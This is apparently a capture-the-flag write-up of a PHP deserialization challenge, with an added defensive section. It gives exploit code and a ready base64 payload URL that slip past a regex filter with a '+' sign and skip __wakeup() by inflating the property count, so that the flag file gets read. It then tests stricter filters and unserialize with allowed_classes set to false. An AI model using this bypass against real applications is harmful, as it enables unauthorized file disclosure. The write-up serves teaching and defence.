攻防世界 Web_php_unserialize

You can refer to this expert's analysis.

Then use the method from a challenge I did earlier: Deserialization: unserialize and examples.

Observe that the value of var is first base64-decoded and then unserialized (during this process the magic method __wakeup() is called).

So I wrote the following code in VSCode:

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            // the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
$demo = new Demo('fl4g.php');
$serialized = serialize($demo);  // serialize the object: O:4:"Demo":1:{...}
$serialized1 = str_replace('O:4', 'O:+4', $serialized);  // '+' before the length is not matched by /[oc]:\d+:/i, but unserialize() still accepts it
$serialized2 = str_replace('1:{', '2:{', $serialized1);  // declare 2 properties while only 1 is present; on affected PHP versions __wakeup() is then skipped
$base64_encoded = base64_encode($serialized2);  // Base64-encode the payload

echo $base64_encoded; 
?>

Move it into phpstudy's WWW directory and open it in the browser.

Copy the output, go back to the challenge, and enter it in the URL:

index.php?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

OK.
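As an added note on the defensive side (this is example code written for this post, not the challenge's source or anything from the original write-up): the regex /[oc]:\d+:/i only blocks a digit-only length, while unserialize() also accepts a '+' sign before it, and on older PHP releases a declared property count larger than the number of properties actually present makes unserialize() skip __wakeup() (current releases reject such a string instead). The script below puts the weak check next to a stricter pattern and next to the real fix, unserialize() with allowed_classes => false, which never instantiates application classes. The Demo class here is a stand-in that only records which magic methods fire; the serialized strings are constructed inline.

```php
<?php
// Added example (not from the original write-up). Demo is a stand-in that only
// records which magic methods run; it is not the challenge's Demo class.
class Demo
{
    public static $calls = [];
    private $file = 'index.php';

    public function __wakeup()
    {
        self::$calls[] = '__wakeup';
    }

    public function __destruct()
    {
        self::$calls[] = '__destruct';
    }
}

// The challenge's check: /[oc]:\d+:/i matches "O:4:" but not "O:+4:",
// although unserialize() accepts a '+' sign in front of the length.
function weakFilterBlocks(string $s): bool
{
    return preg_match('/[oc]:\d+:/i', $s) === 1;
}

// Patched pattern: allow an optional sign before the digits.
function strictFilterBlocks(string $s): bool
{
    return preg_match('/[oc]:[+-]?\d+:/i', $s) === 1;
}

// Preferred fix (PHP 7.0+): refuse to instantiate any class at all. Objects
// come back as __PHP_Incomplete_Class, so no application __wakeup()/__destruct() runs.
function safeUnserialize(string $s)
{
    return unserialize($s, ['allowed_classes' => false]);
}

// Constructed inputs: a normal serialized Demo and the write-up's mutated form.
$normal  = 'O:4:"Demo":1:{s:10:"' . "\0Demo\0file" . '";s:8:"fl4g.php";}';
$mutated = str_replace(['O:4', '1:{'], ['O:+4', '2:{'], $normal);

printf("weak filter blocks normal:    %s\n", weakFilterBlocks($normal) ? 'yes' : 'no');    // yes
printf("weak filter blocks mutated:   %s\n", weakFilterBlocks($mutated) ? 'yes' : 'no');   // no
printf("strict filter blocks mutated: %s\n", strictFilterBlocks($mutated) ? 'yes' : 'no'); // yes

// Plain unserialize() of the well-formed string instantiates Demo and calls __wakeup().
$obj = unserialize($normal);
printf("plain unserialize -> %s, calls: %s\n", get_class($obj), implode(',', Demo::$calls));
unset($obj); // drops the last reference, so __destruct() fires here

// With allowed_classes => false the same string yields an incomplete class and
// none of Demo's magic methods run.
Demo::$calls = [];
$safe = safeUnserialize($normal);
printf("safe unserialize -> %s, calls: %s\n", get_class($safe), implode(',', Demo::$calls) ?: 'none');
```

Pattern matching on the serialized text is a last line of defence at best; the allowed_classes option removes the object instantiation that both __wakeup() and __destruct() depend on, regardless of how the length or property count is written.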

Corrections and additions are welcome in the comments.